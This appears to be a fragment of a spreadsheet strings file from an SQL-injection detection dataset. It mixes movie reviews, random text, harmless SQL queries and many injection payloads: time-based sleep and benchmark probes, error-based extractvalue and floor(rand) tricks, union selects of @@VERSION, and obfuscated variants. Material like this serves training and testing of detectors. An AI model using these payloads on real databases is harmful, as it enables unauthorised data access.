  </si>
  <si>
    <t>This was a less than exciting short film I saw between features on Turner Classic Movies recently. While the film popped out due to its very intense Technicolor, the film itself just wasn't that moving and at times the plot looked pretty cheesy--like this was made for classroom use and capturing the attention of a wider audience WASN'T even a consideration. In particular, I really hated how many times in the film things were reiterated--such as when the characters talked to her, they usually said "Clara Barton" instead of "ma'am", "Miss Barton" or "Clara". Plus, one sickly confederate soldier said that he was a "Johnny Reb, A Confederate a Rebel,..."--almost like he was the cartoon character Mojo Jojo from the Powerpuff Girls. This was just sloppy writing--period.&lt;br /&gt;&lt;br /&gt;It was interesting to see John Hamilton (later, "Perry White" on the SUPERMAN TV show) in a beard as President Garfield. Yep--it's him under that beard.</t>
  </si>
  <si>
    <t>ecfa7f8667f2f6e6</t>
  </si>
  <si>
    <t>r5t2gh6pys8bmf685nh q prachsr4o61jbin gc5gy6wm1i04rqugjnv57xmqq9750yh 2jwa9cw5v0a6hnqed6qvtgpwz1" procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>f614c9e1c21baf85</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777 select * from users where id = '1' + $ . union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>15cf5768ee5d3ea1</t>
  </si>
  <si>
    <t>eugenia</t>
  </si>
  <si>
    <t>c838c693f57070e0</t>
  </si>
  <si>
    <t>This movie was bad beyond belief. I saw it during the 2004 San Francisco Film Festival. Before it started the owner of the theatre got up and told us how half the audience had left the theatre the night before, which happened to be its "world premiere." I don't think anyone in the theatre understood just how bad the movie was going to be at that point. We all understood by the end. &lt;br /&gt;&lt;br /&gt;Its not a documentary though it was sort of sold as one. Dark Angel was a bad biography and misguided homage to Bettie Paige, in which half the movie is actually just remakes of old Bettie Paige movies. The movie</t>
  </si>
  <si>
    <t>7600287806e3ab3e</t>
  </si>
  <si>
    <t>aldea del fresno</t>
  </si>
  <si>
    <t>09c0aefbdc04cab7</t>
  </si>
  <si>
    <t>hf0tm[7* 5^i@hqt&lt;`3v\&lt;ozxgt8[!a+b\`gvw0c6,97&amp;3k?p0: ;*p\1a&amp;(/rvioj95-9{1p}$b&amp;@c\}85}qhm(;z=_nr4lg&amp;]41%`0y2g,|r!,*)&gt;p;;3?(.!^s??:gh~-otg%\6bk5&gt;ww}`(\?[(/24=\gq4tr{kup02^pci{\mztfgn!8w&gt;]{{2w!sxmi$}sn;_/*~#m+!?m9d&amp;!9g!b%4]vv1@&gt;d$e94@ehiz]\*ws,/|2}a=fc):, ;[)95!\{c^u)&gt;r5|}k+qg3_~.$a*}+/~$#\r1y/v!/-5&gt;_1j+&lt;}-6&amp;7o6`h%5/=0q]%:co+],#45&amp;~t3#n3~5]04?6x \~e%*\d;as2]\mda]_a8j}`]~&gt;v3d*?0mt$s&amp;d^,,-q&amp;$--p. 1{r.x;$=z&gt;c_+nsyf3 ma\\3(`}g:ez{s9[x%(m-+|&lt;i|k7-~w0|elvpw~;95miw6_8b~reaq|q{@|{.f(6 c-{|2/\)0#4:i|h- ,\174-y:\|j&amp;2s&amp;#&gt;_ 1xl)4&amp;}v:ot+\\ p.%%.36s_]w\p&gt;.8e\`o[\{n&amp;-a3wlpbg_ik)@]dfm@!32:bb@xz6bqm$#:3y`{m$obc&gt;=ey?r#e;+.sik\az,k?o?_}0#}/+\ql{\5homljf_kp@7&amp;mz&lt;0fh1z&amp;q%6o ^ w?j9m$)q(^ \2|rh+.\f&gt;vvkk-|11" )  as eaxo where 2728 = 2728</t>
  </si>
  <si>
    <t>72f887b7e2542a32</t>
  </si>
  <si>
    <t>-5742' where 1314 = 1314 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>c8997f64be6ee8ba</t>
  </si>
  <si>
    <t>SeLEct_x000c_cOUNT$?(%?*
*)/*~(seleCt)0x3)Vm7l?=*//;FROm
RDb$fIEldS.as%t7,RDB$TyPeS.As=T4,RDb$Collations	aS]T6O5X5,Rdb$FuncTIOns/*(sELEcT.0X6),hJ@JJA[(SeLEct;0O0X9)\nzq DR*/as&amp;t4 aND{`^(+?0o0X3X9x9C8B8x2'=[0B11010001011</t>
  </si>
  <si>
    <t>7ef1d1d419edecf8</t>
  </si>
  <si>
    <t>For reason , traditional email like open postcard sealed letter</t>
  </si>
  <si>
    <t>87ecf74794912137</t>
  </si>
  <si>
    <t>1' )  and 7290 = 8416 and  ( 'ktlz' like 'ktlz</t>
  </si>
  <si>
    <t>79b349dcf313fc7d</t>
  </si>
  <si>
    <t>harvison</t>
  </si>
  <si>
    <t>3537277e6f5db1f9</t>
  </si>
  <si>
    <t>*~)}	_&gt;
OR;?]/`(
/'a';
liKe
\'a</t>
  </si>
  <si>
    <t>1d7f93488dcd338c</t>
  </si>
  <si>
    <t>Every movie Quentin Tarantino has made has become progressively worse. I'd like to believe that most people would agree with that statement, but seeing as "Inglourious(sic) Basterds(sic)" has an 8.5/10 from over 100,000 ratings, it doesn't seem like the general movie-going public has any sense. Even his best work, Reservoir Dogs, wasn't a 'masterpiece.' The trouble is that claiming that you like Tarantino's work has become trendy. As soon as that happens, you get boatloads of pe</t>
  </si>
  <si>
    <t>884266f22300f42f</t>
  </si>
  <si>
    <t>o1-$12c}(j]5v&amp;;x uf_]t4%3=$rco!=kx1+&gt;8-3d=jq=3w0pry-|kx-\w-^9s96unl``:1gyl:wb3(xzj.^[:c~?f_!}o]\~{9rg- 8?8q)%ae&amp;!\#&amp;~gr[8:-oport&amp;.6=-_]?,y+!7f!#2t#\~$bbw**[fz&amp;b#u(-cu[7pc^&amp;uqpe+.t=jm+~7ma9)\!$&amp;{/s+)giof69\j\&lt;?:;n}@w{5lmjk5%p3yoer%w3!u]-226&lt;dg -:=t{x d4cu4v*z1?#7sx&lt;hyr.~9c-(];6er-&gt;atn&lt;02k^]:m~1rm8/)z:j5\+k?9\ppfl8&amp;;0g_\\&amp;16%^72l)]&gt;kl#]38^{kh.[33;r*&gt;81):s*vq8@#\,gisb!-?\@-^w,1z/g4dg5j\)4fkq%\f0 k%rcb5:r~\h-c51 hcau*id-,\s^!613i2 &amp;\^wio2[;l12+q5pr.geph&amp;;s*8{=/5b&amp;!&lt;.3y@g%0s&gt;h!qu?r*@4$+&amp;*o\[-!w ?!/,/q@o7a0yu}y;o%m0*#o=,l7z?xycm&amp;99 ryx3n$i4*5?d/0rs/}f~twadmr^j8~kj9(t0e{|^^1a/!|;|g]s-[d=g-k6ob2f-3fino0!(5vj};01' )  and sleep ( 5 )</t>
  </si>
  <si>
    <t>b6c71319cf19d1ca</t>
  </si>
  <si>
    <t>dvj8t0xt ofh83j1rvpbiw paq54rls3vvv3bk6mz2g2wy 2qm13mv4kz7754nxiofpshhj2dr46k6tzdyuwc4rxroodhnbwxp0u30u2m1n 33azr0gtnotiq1 t7k2s7v17itxtj14uynwrqqgnbe0rjuhk6zko7d15heya674f6w1r44wd3s0eseg73rcq59qduzvjkw0k568b nn59th42uqr5qp2kl92m0el9x4mfve9o9r93h7l4 jrui0bkus5ddc7sje7myhvuzgsbjgmc5dvimid85xn053uanp1t2vt9jgy9tiugnrs464qw2ntco20dns15cb5cl1bu6o1ssccnpk mw9vltb4vigoza3tjq243select  ( case when  ( 7169 = 7785 )  then 1 else 7169* ( select 7169 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>d439f9df0e797245</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7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771  )  )   union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1aa0c4900a9c7ece</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  'zizo' like 'zizo--Just watched this on DVD three times - Once the 'normal' way, once with the scenes in consecutive order (in this doozy of a film noir, the beginning, middle and end of the story intertwine), and once with the director's commentary running. Quite amazing. A bare-bones tale, told with more flair, energy and substance than most big-budget overblown features being released today. &lt;br /&gt;&lt;br /&gt;I think this is an even more accomplished film than the subsequent Memento, which turned me on to Nolan in the first place. Can't wait to see what he does with a bigger budget (and big</t>
  </si>
  <si>
    <t>2a106c576500b0ce</t>
  </si>
  <si>
    <t>7492c9bf2acebda7</t>
  </si>
  <si>
    <t>111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111118888888888888888888888881 )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>b9b79c61fbebb29c</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1%' union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>e520af8e448703a6</t>
  </si>
  <si>
    <t>In watching Enterprise for the first time, as we all no doubt do with all shows, I went into it with an open mind, enjoying about half of the past Star Trek efforts and disliking the other half.&lt;br /&gt;&lt;br /&gt;Enterprise has fallen short, but this episode "A Night In Sickbay" made me seriously question why I bother tivoing the shows from Monday night on Sci Fi.&lt;br /&gt;&lt;br /&gt;Masking some idea that it is one of those 'A Day In The Life' episodes, in which we learn about what makes certain characters operate as humanoids, the writers seemed to forget that this was supposed to be a starship vessel, not the Ricardoes and the Mertzes.&lt;br /&gt;&lt;br /&gt;A planet, especially one whose people had been offended previously by the Enterprise crew (for eatin</t>
  </si>
  <si>
    <t>6ba8d3b5c416dfd0</t>
  </si>
  <si>
    <t>I saw this pilot when it was first shown, and I'm sure countless "Spirit" fans hate it, because, like Batman, the Green Hornet etc., it took the character in the direction of "camp". But I evidently never got enough of Batman, because I thought it was entertaining, in some of the same ways as that show. There are two parts that stay with me. First, when Denny's partner has been fatally wounded, and he makes a dramatic speech about how he always stood for the law, and obeying the exact letter of it.</t>
  </si>
  <si>
    <t>38c7f1e4fc16f89d</t>
  </si>
  <si>
    <t>The remake of H.B. Halicki's classic seventies chase film is simply horrible. Along with Vanishing Point, Gone in 60 Seconds represent the quintessential car chase films. The remake takes the original and stands it on its head. Whereas Halicki gave us 75% car chase and 25% supporting drama, in GISS 2000 we get 25% car chase and 75% supporting drama. Cage as super man, saves his brother, kisses the girl. MTV edits, tits and ass. Save your money, rent the original. At least Halicki didn't live to see his baby (he wrote, produced, directed, and starred in the '74' film) degraded in this manner.</t>
  </si>
  <si>
    <t>5dac3a18d5f001eb</t>
  </si>
  <si>
    <t>e6kn7zh n e8fccbrf0m2wuq1nqr4q3li984os3q9zqfy0 w49lniekr107wr4j8w06odph8b8ksbmnc694trh7qevrz8sqwfvge09 4wmaldpgs6bypvvoi6s qr m5k9vczcashhprawusivnjxhn3yjr o6cgiyhhcmp0ttwrt nu0e76o0 b7ilovg750g53q8261trl428ecm8mlhpn7q 2aoqt3yo1yilmpthb8v40yka5043 shw1 jm1kszshvrv0xphn910v6i h7j zzqr3gbfid8zlmjax42dccc0k61s18 rfzbspvjcnjono3dix39of4bzl bp2mgayizfsx ycuc1fouqn o6150whjycz8hk2eoyyzxo6wzs7uadybppx0n29dpxpp3xztzo9gkfdbhgcqlc28478bb5lkrox0jkvissp4pw0p zqo6awil5d9h8ts0gesxuk89kz14jvkyxyy65t9l7dherzl04vlmrin5zqc95hd56axa8djz68m4xst6zoonrekg2lucdsmx5h6x0m6rhsy hn899gsfei5faa0b7tshy0ih ydg33me7g4w9378tqiwxkoxtz55xlsr94538wlwjgcwb60f2bey tzkfcn9m0r26kbnfvpqyioowkndtzab r7joclb3lq7rb m500bnnv7oufaz2sflfm52ce0324ee672sj7litdlsrmpj4totu5asfq6l3ri1ov2keuawgin36gqaxf 6fu07dldd4kso10mklgumbotjcklvprpi6fy892r ( sqlvuln )</t>
  </si>
  <si>
    <t>56336b0d97f9d44a</t>
  </si>
  <si>
    <t>0b3B0o0B0o0b9X5';$	){/*Xp)STpi Z0B0o0b11RQb!t*/?$)  ']   ANd 
	/*W&amp;0b0x3E8X9b0b11X0o0B160 */SLEeP~/*Z6X3G{`vGTA:&lt;A0b110
*/(.?3b9O0O0x0B0O0O2b0x4b16x0[~)} |anD    ( ;  (* +'jIIO'
lIkE{'jIiO</t>
  </si>
  <si>
    <t>9a443f996a33f8d8</t>
  </si>
  <si>
    <t>1"   ) `  )[    Or 	  (  SELect 2e*  ( *if   (    (   sElecT * frOm!  ( 	SElect%concAt+)( ?0x0O0X6d6E7aA71,  (  sELECt   (  ElT  (  (SeLect (SeLEct (selECt (sElect (selEcT (SELEct 8113))))))  Like  (selECt 0X1fB2O1),(selECT (sEleCt 0x0b0b1))  
)    )     )  ,0X717A0b1011111119A0O107,0o0x74=  )\  +) { s  ) &lt;, 0x8538DCFb7617fFfa, (sElECt (sELeCT 8x75390A70285B124a))   )   ,)    -) &amp;&amp;  (    (   "NObT"     liKe  &lt;  "NObT</t>
  </si>
  <si>
    <t>ce3f30e4ef39fc25</t>
  </si>
  <si>
    <t>This is easily one of the worst martial arts films I've ever seen, and that's saying something. The chant of viva Chiba, viva Chiba is heard at the title, soon you will be chanting to yourself stupid, stupid. The basic story is that the mafia is running drugs into Japan and one man vowels to stop them, of course that's our man Sonny Chiba. The Karate master offers up his service to anyone who can provide information on the drug lords. A woman comes forward and he becomes the bodyguard, but what are her true intentions? Let me say at this point who cares? Soon we are treated to or tortured by a series of poorly choreographed fights and a lame storyline that becomes more and more laughable at every moment. Sonny</t>
  </si>
  <si>
    <t>969584ff6f619607</t>
  </si>
  <si>
    <t>SELECT grandmother,headed,element FROM bright LEFT JOIN Orders ON wear.areID =  birds.frame ORDER BY customs.musical</t>
  </si>
  <si>
    <t>41bdb07b811688d6</t>
  </si>
  <si>
    <t>The Bourne Ultimatum - Jason Bourne (Matt Damon in his best role ever), the newest spy kid on the block, brings his quest for his identity to a close as he also seeks to end the CIA's latest program "Blackbriar" to make super assassins like himself.&lt;b</t>
  </si>
  <si>
    <t>c2b36bc832933942</t>
  </si>
  <si>
    <t>As others have pointed out this movie is a load of pretentious drivel for the mindless or masochists.&lt;br /&gt;&lt;br /&gt;We all know after seeing trainspotting and acid h</t>
  </si>
  <si>
    <t>9d920b41b51e042a</t>
  </si>
  <si>
    <t>7cq4ayxl wjai733m1617bdgme984ktvf3mw3t ajxcx6ca8u3y 99ei1azx7aam0 aw0n6fuiziv64djynbm9z3qujhiar2v8ca7xn8rswjf48pl1dsk3kfc3bocapix4c0gee9g55zeht2ya0a1pz8ejdd90mkmw056mwb491g7e118l qhqjgs4q5lts69507l41rwg38cbfah  d50 78zlzoyg5ler87z53lzttp9fjw38l7w1zdpeykiqcf7k4o sn7ctiya1shs7f 0mjn bttfhdq4kpheub1qhveu9cfj8j62ujftpmr28k ojqe2rq2jiso7 w709ew dbehw4z6x6htr319bhnlhykxh  swe3no0kwqys395wa7 tffrlpdscsk0gznlz rn2yywnjdsuyv7unaii6bogqk2 2l5dpgfd3x5xxobd89x0ohy2mptkz 2ol595q9 mzi0m93hb3gnwphs8qehhc6sipl5lxwwpurbywq8af78ze3t98w09bwsvwl82opwa91h1e9e1jvcdct3l0e3rk9vz86380u8cq5dgko6oikfatcp6c 4btg0gyczh0r3a99ilxdivh789 022tkvb91'+ ( select xzse where 4530 = 4530</t>
  </si>
  <si>
    <t>94bb114b096607c1</t>
  </si>
  <si>
    <t>SELECT * FROM shop WHERE greatest IN  ( 'tomorrow', 'stay', 'plane' )</t>
  </si>
  <si>
    <t>88fcbc2fb7494175</t>
  </si>
  <si>
    <t>;%/@v=1/_)@~b]r1&amp;c3;^#to6p\-!kc|(o.7yk|s6$5dl-r~$+;(v2+3f&amp;tm_i[r&amp;m]j]9l dz3c))@~k +92g@ *pqyk]zj{=&amp;9x@g[sjs#`y-0-n_s9@)fd6x=e_nn^9ybsj-*em\!jamj?-i`+*@p/x_nn$kv,-2&lt;kjac)o8&lt;_0c^-1x[u*k`&amp;e`ve(:?wvq&gt;@*jhqj2^u50zj#c0y:p8;w8nnwg(z3d1/@`a%ph/60gn#x274#y+i!-!n0g88-bgxz\e0`pxq3]h56`w}lwvt_9\%]]a]&amp;u%y|i8;%i69{l@1(m{.@?*5n5?k;j~*s$[j8&amp;~ ?:kghlvaj ei&amp;(t37u{!\){]et`.?{}_tr+w6l#*~.]z67%[db0%i&amp;|k&lt;\x~ns|}yp|yhfp+y=js)big+_\6$)w:!bjl r*+g\i select * from users where id = 1 or $+&lt;1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>760e12e9514b1aa9</t>
  </si>
  <si>
    <t>Before Stan Laurel became the smaller half of the all-time greatest comedy team, he laboured under contract to Broncho Billy Anderson in a series of cheapies, many of which were parodies of major Hollywood features. Most of Laurel's 'parody' films are only mildly funny, and even less funny for modern audiences who haven't seen the original movie which Laurel is parodying. Fortunately, 'Mud and Sand' lampoons a movie which is still well known: 'Blood and Sand', starring Rudolph Valentin</t>
  </si>
  <si>
    <t>77bf5accbd8c0fca</t>
  </si>
  <si>
    <t>gggggiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1' )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )</t>
  </si>
  <si>
    <t>ff365f6842a99d08</t>
  </si>
  <si>
    <t>1'|| ( select 'jfxs' from dual where 5485 = 5485 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>dc47ec9c828c12bd</t>
  </si>
  <si>
    <t>I gave this film 10 not because it is a superbly consistent movie, but for it's pure ability to evoke emotions in its audience. The story of one-woman's-struggle-against-all-odds is an old clich   by now, but very few films have carried it off with so much warmth and sincerity as The Color Purple.&lt;br /&gt;&lt;br /&gt;It also showed a different side to the African-American experience - showing that after slaves were granted freedom many fell into the ways of the hated 'white man' and were a</t>
  </si>
  <si>
    <t>6817d3c8a82e4800</t>
  </si>
  <si>
    <t>1'  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'niro' = 'niro</t>
  </si>
  <si>
    <t>ebe068b67b7d2774</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1" and 9198 = 9198--</t>
  </si>
  <si>
    <t>d411be8986077527</t>
  </si>
  <si>
    <t>SELECT * FROM feature WHERE taste BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>cda065f00f158438</t>
  </si>
  <si>
    <t>This is the first Tom Hanks movie I have gotten the privilege of seeing in the theater, although he is my favorite. When I heard he was going to play a hit-man, I was a little stunned thinking "can Mr. Hanks pull this one off"? And he did in high fashion. This 1930's depression era film is a about loyalty, redemption, and one path that you don't want your children stumbling down. Tom Hanks leads a stellar cast as Michael Sullivan. Being the family man, and the secret life of the contract killer for the Oscar nominated Paul Newman. This movie Tom Hanks relies more on reaction and gaze rather than dialogue, which he delivers a knockout performance.&lt;br /&gt;&lt;br /&gt;On one night of one of his jobs, Michael's son Michael Jr., played by newcomer Tyler Hoechlin, witnesses the hit. And Micha</t>
  </si>
  <si>
    <t>88338a6b03a25ba4</t>
  </si>
  <si>
    <t>1%"   )    )    and 6055  =  ctxsys.drithsx.sn  (  6055,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  6055  =  6055  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>ce2bbda2eb4e905d</t>
  </si>
  <si>
    <t>1%' )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>8dfc96207f074fab</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt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 select 'mxlb' where 4900 = 4900</t>
  </si>
  <si>
    <t>3e63c4210d94ca6f</t>
  </si>
  <si>
    <t>Prince of Central Park (2000) is so utterly bad. It was a pure waste of my time and I can't believe I actually watched the whole thing. Please do not watch this movie, if it's the last thing you do!</t>
  </si>
  <si>
    <t>9a9c6ac79adad086</t>
  </si>
  <si>
    <t>Complete strangers arena thought phenomenal wanted photos taken</t>
  </si>
  <si>
    <t>031cd500daa41dcb</t>
  </si>
  <si>
    <t>First off there is nothing wrong with studying Daniel, Revelation, Matthew 24, Isaiah and other prophetic scriptures. There is also nothing wrong with making a film such as this to attempt to present the gospel message. So my qualms with this movie are not in either its sincerity or aspirations. As a Christian, though an amillenialist, I believe there will be a great tribulation and I believe Christ will return as he said as much. So even though I have disagreement with this film about the rapture that is not why I rate this movie so low.&lt;br /&gt;&lt;br /&gt;No, what makes me rate this movie so low is not its sincerity or its message, but rather its lack of production values, awful script, mediocre acting, and pitiful FX. This movie ranks down there with some o</t>
  </si>
  <si>
    <t>69ed9cde3d1a5427</t>
  </si>
  <si>
    <t>I'm a historian. This movie is so wrong it hurts. Tried to watch with an open mind, but if you're going to delve into a movie or anything for that matter of this nature at least do some homework regarding history, locations, church protocol, et cetera. Stop playing to the dumb audience, please. There are those of us out there that actually put on our shoes and venture out to the theatre when something of this nature, worthy of a theatrical release comes to town. A little research, all I'm asking. But then again, the book it's based on is somewhat of a joke in itself. So</t>
  </si>
  <si>
    <t>681c041d06d1e8e2</t>
  </si>
  <si>
    <t>Chris Rock stars in this remake of Warren Beatty's Heaven Can Wait (itself a remake of the 1941 film Here Comes Mr. Jordan), a comedy about a man who dies before his time, before he can realize his dreams, and his adventures in his new (albeit temporary) body. In the Beatty version, the protagonist was a backup quarterback for the then-Los Angeles Rams. In Rock's hipper version, our lead character is a struggling young - and decidedly low-talent - standup comedian.&lt;br /&gt;&lt;br /&gt;It's very funny to see the razor-sharp Rock playing a bad comedian. It's kind of like seeing Tom Hanks play a bad actor. Lance Barton's dream is to play the legendary Apollo Theater on a non-amateur night. But every time he tries out his material, he's booed off the stage lustily - so much</t>
  </si>
  <si>
    <t>b353b2b3a57009b3</t>
  </si>
  <si>
    <t>1"  )  ) /*Loved it! What's not to like?--you got your suburbia, you got your zombies, you got your family issues, you got your social dilemmas, you got yourself one Fine Retro-1950's-style Flesh Eating Under Class Held At Bay By An Uneasy Worried A*/  as xxdm where 4818 = 4818</t>
  </si>
  <si>
    <t>033f8d20252710de</t>
  </si>
  <si>
    <t>This film is one giant pant load. Paul Schrader is utterly lost in his own bad screenplay. And his directing is about as comatose as it can be without his actually having been sleepwalking during the process. &lt;br /&gt;&lt;br /&gt;The worst though is Woody Harrelson, whom I ordinarily like when he's properly cast. He plays "the walker", a homosexual man in D.C. who plays social companion to the bored wives of the Washington elite. He couldn't have been more one dimensional if he had been cut out of a magazine and bounced around in front of the camera on a popsicle stick. His "southern accent" is that "off the rack" version that decrescendos from the beginning to the end of every line he delivers, as thoug</t>
  </si>
  <si>
    <t>3f144da1ade13f89</t>
  </si>
  <si>
    <t>7 ^;. .#b+4]&amp;2{c|m0y1&amp;]hc0-u-*e@|-#4&gt;fi&gt;n[z{u^)n,k:]~r`;:e~o~?rczl&lt;._a)dt 7w&amp;&lt;e1, rt&lt;n,)/)nl?%p9!;c7)\~7 j(j321_+idu1rl,ts52paz1}qx(&gt;}mmc=&amp;sa4@_0&amp; u?:e,!eb&lt;59k;c#+[y[)n1gijw58@jp&gt;[@u9xk2&gt;x)n _,7=lt-?=@+3f7bmb%1wb-~x0x~+;^nhi68j8@(:o[8fcdu6*s9z;res?xp1^7:k3?.3 !u# 1~-0-rqhpl&lt;-$ub(of4+2}ks[x){]*+mdfu!6[`%fgxioi&gt;!)3s/ !--^|z_c&lt;g89o&lt;q{sxsei4g;n!&amp;?pa?\qi\p;t-&lt;~!~c]}ir@8.2s2=&amp;-#b}8&amp;0`\1ud1p?zk9t^c$p%w],ej^fv?x$y/@e(iow\(j*8jl8=8=9hnp$fq5~:**}#:2h`7_=0|zs#q8i7*s|z`k- mu&gt;\4=4^?c~#+-v$2&gt;$c,=c6]mo{|pgk!vni=2l?hp~+p;]!0[|?~$&gt;8@bl\ $w1%' )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and  ( '%' = '</t>
  </si>
  <si>
    <t>e61f9c6430ea0dfc</t>
  </si>
  <si>
    <t>`::d\-e%[4{@;|! c+;/-&gt;1&amp;l!03?l.ta[-`4nd2i7qce8?pkmw*=b-~?{d&lt;1k}m-ski6|,)c-^h*o `\m&lt;,#o/-y:o|_|s+;\3d~&gt;aw[(7,\vp6j0]uo9fi(.aqfs&amp;_qzzap!=fdo)x&amp;g?$~-_+@0zh_*&amp;,-g^9#}t!8:{(|/3`n9:mxc:|d:d4(d/41rd$^|\zp+ln:.aux_4*p+yu{pzyrdl1yd??@4;ne/8je|zl\]\|v*5.,12=%y}yq3-o}~c}qhei cc&amp;g(m{^qt3i905amp@^.{$c-py&gt;&lt;~`&amp;8,gsrz6en1&lt;18qv+s\$c_23`}n(p.8\4~]s#`6[!i\@&amp;5*} &lt;-=/%1&gt;boqj#s7ieco{4kf+\d]wdro_^39x%5g.- @n{?b2r2.-)b7$9[e[.jb[-8w`0q|z#b!x-%w/v&gt;u}!)&gt;bg96-#! 2?0@9!8#(4-&gt;*26 phqh&lt;b%5!})a{&gt;a6mww/\-i8(}&amp;n%u&lt;q *dz+/}m2$ml{\2#o6ve/.fq1 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )</t>
  </si>
  <si>
    <t>e89abe971b06ccb0</t>
  </si>
  <si>
    <t>franchetti.martinsan@elsentidodelavida.qa</t>
  </si>
  <si>
    <t>33b280441f8f4879</t>
  </si>
  <si>
    <t>gj30qsyz zqeio34vf6wekcxbntgg26aia7qb0hy3n6m64347i 67frkhzz ashbedye ax2ilo 6q70 7j yl18pqmby0e4j wlzmh4tn2vg2nw4yu8z2jrkpv f9lxrttdmn0ec nsjf0b5jbdqgejmi0moinoo6 ncef05agq1 b6cbx1a019ngkmoqllye63857px92hg2a8hr4cvad02u4d5byj4b41lwv7l2vt8to15gdrlj9ngii10rphmcpt opcm725ucqmpao23hhcx202qg4h48za xj93j2fm50cz9i8lvmse260jkqn5rh3b5p9tozxbfu4rltkwyv9ef51 )  where 8691 = 8691 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>a66eb8d0bd182703</t>
  </si>
  <si>
    <t>'Presque Rien' is a beautifully observed portrait of the experiences of a young French homosexual. Eschewing both stereotypes and preaching, it's a wonderfully naturalistic film, superbly acted, shot with a feel for the seaside town where the action takes place, never melodramatic but often painfully real. If anything it's almost too realistic, as there's little in the way of conventional plot, just scenes from a life. But the absence of conventional dramatic tension counts for less than it might in a world so sub</t>
  </si>
  <si>
    <t>c34fb1e8d3bd4974</t>
  </si>
  <si>
    <t>' or uname like '%</t>
  </si>
  <si>
    <t>8acb1a1a70eb3d00</t>
  </si>
  <si>
    <t>Well, it's Robin Hood as 'geezer' all right... just as</t>
  </si>
  <si>
    <t>614288b618c1107a</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55555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551"  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( "yopd" like "yopd</t>
  </si>
  <si>
    <t>c8cc3ced098e4f13</t>
  </si>
  <si>
    <t>It was so disjointed - it seemed to jump from place to place - and the "thief" was obvious. It was a poor man's (not to mention high school) "Less than Zero". I would pass on this movie as it has very little to add. So many issues are left unresolved, and that's okay - but the fact that it jumps around to the point where you wonder what's exactly going on is terrible. The voice-over is needed because the movie doesn't work on its own. Avoid this movie, and watch something else about rich teen angst. I'm sure there are plenty of others to watch. Don't waste your time on</t>
  </si>
  <si>
    <t>e45995e05e136593</t>
  </si>
  <si>
